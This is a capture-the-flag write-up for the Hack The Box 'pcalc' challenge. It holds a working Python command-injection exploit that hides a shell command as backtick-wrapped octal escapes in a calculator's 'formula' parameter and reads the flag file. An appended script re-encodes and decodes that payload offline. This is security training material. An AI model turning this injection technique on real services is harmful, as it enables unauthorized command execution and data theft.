https://app.hackthebox.com/challenges/542

Description

A calculator service has been deployed at an enemy’s agency, for their personnel to be acquainted with human numbers. We need to infiltrate the application and get access to the secret flag stored inside its system!

Exploitation

#!/usr/bin/env python3
# pcalc: send a backtick-wrapped, octal-escaped shell command through the
# `formula` parameter and pull the flag out of the response.
import re
import sys

import requests


def generate_payload(command="cat /f*"):
    # Each byte of the command becomes a \NNN octal escape, so the submitted
    # formula contains only backslashes and digits; the surrounding backticks
    # make the decoded text run as a shell command when the formula is evaluated.
    octal_bytes = ['\\' + format(ord(char), 'o') for char in command]
    return f"`{''.join(octal_bytes)}`"


def exploit(url):
    payload = generate_payload()
    print(f"[*] Generated payload: {payload}")
    try:
        # requests percent-encodes the backslashes and backticks in the query string.
        r = requests.get(f"{url}/", params={"formula": payload}, timeout=10)
        flag = re.findall(r'HTB{[^}]+}', r.text)
        if flag:
            print(f"[+] Found flag: {flag[0]}")
        else:
            print(f"[-] No flag found in response (HTTP {r.status_code})")
    except requests.RequestException as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    exploit(f"http://{sys.argv[1]}")

Summary

pcalc: the `formula` parameter is evaluated server-side, and the exploit relies on two properties of that evaluation. Wrapping text in backticks makes it run as a shell command, and writing every byte of the command as an octal escape (`\143\141\164\40\57\146\52` for `cat /f*`) means the submitted formula contains nothing but backticks, backslashes and digits. The command's output comes back in the HTTP response, so a regex for `HTB{...}` recovers the flag.
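The following is an added example, not code from the original writeup: it builds the same backtick/octal payload the exploit sends and then decodes it offline using the escape rule a double-quoted-string interpreter applies (a backslash followed by one to three octal digits), so the bytes the target would execute can be checked before anything is sent. It also offers a zero-padded variant (`\040` instead of `\40`) that stays unambiguous even if a literal digit ever follows an escape, reports which characters the encoded form actually contains, and runs the writeup's flag regex over a constructed sample response. The sample response and the `pad` option are assumptions for the example.

```python
#!/usr/bin/env python3
"""Offline check of the pcalc payload encoding (added example, not the writeup's code)."""
import re

# Greedy 1-3 octal digit escape, the rule most double-quoted string syntaxes use.
OCTAL_ESCAPE = re.compile(r'\\([0-7]{1,3})')


def encode_octal(command: str, pad: bool = False) -> str:
    """Encode every byte of `command` as a \\NNN escape and wrap it in backticks.

    pad=False reproduces the exploit exactly (\\40 for a space).
    pad=True always emits three digits (\\040), an assumed safer variant: a
    following literal digit can then never be absorbed into the escape.
    """
    fmt = '03o' if pad else 'o'
    body = ''.join('\\' + format(b, fmt) for b in command.encode())
    return f'`{body}`'


def decode_octal(escaped: str) -> str:
    """Undo the escapes the way the interpreter would; other text passes through."""
    return OCTAL_ESCAPE.sub(lambda m: chr(int(m.group(1), 8)), escaped)


def inner_command(payload: str) -> str:
    """Strip the backticks and return the command the shell would actually run."""
    if not (payload.startswith('`') and payload.endswith('`')):
        raise ValueError("payload is not backtick-wrapped")
    return decode_octal(payload[1:-1])


def payload_charset(payload: str) -> set:
    """Distinct characters present in the submitted formula."""
    return set(payload)


def extract_flag(body: str):
    """Same regex the exploit applies to the HTTP response body."""
    found = re.findall(r'HTB{[^}]+}', body)
    return found[0] if found else None


# Constructed sample response (not a real capture) from a page that echoes
# the evaluated formula back to the client.
SAMPLE_RESPONSE = "<html><body>Result: HTB{example_flag_value}\n</body></html>"


if __name__ == "__main__":
    for pad in (False, True):
        p = encode_octal("cat /f*", pad=pad)
        print(f"payload (pad={pad}): {p}")
        print(f"  decodes to: {inner_command(p)!r}")
        print(f"  characters used: {''.join(sorted(payload_charset(p)))}")
    print(f"flag in sample response: {extract_flag(SAMPLE_RESPONSE)}")
```

Run it with no arguments; the decoded command must read back as `cat /f*` for both variants, and the character set printed should contain only backticks, backslashes and the digits 0-7. If a decoder built from the same rule does not round-trip your command, the target will not either.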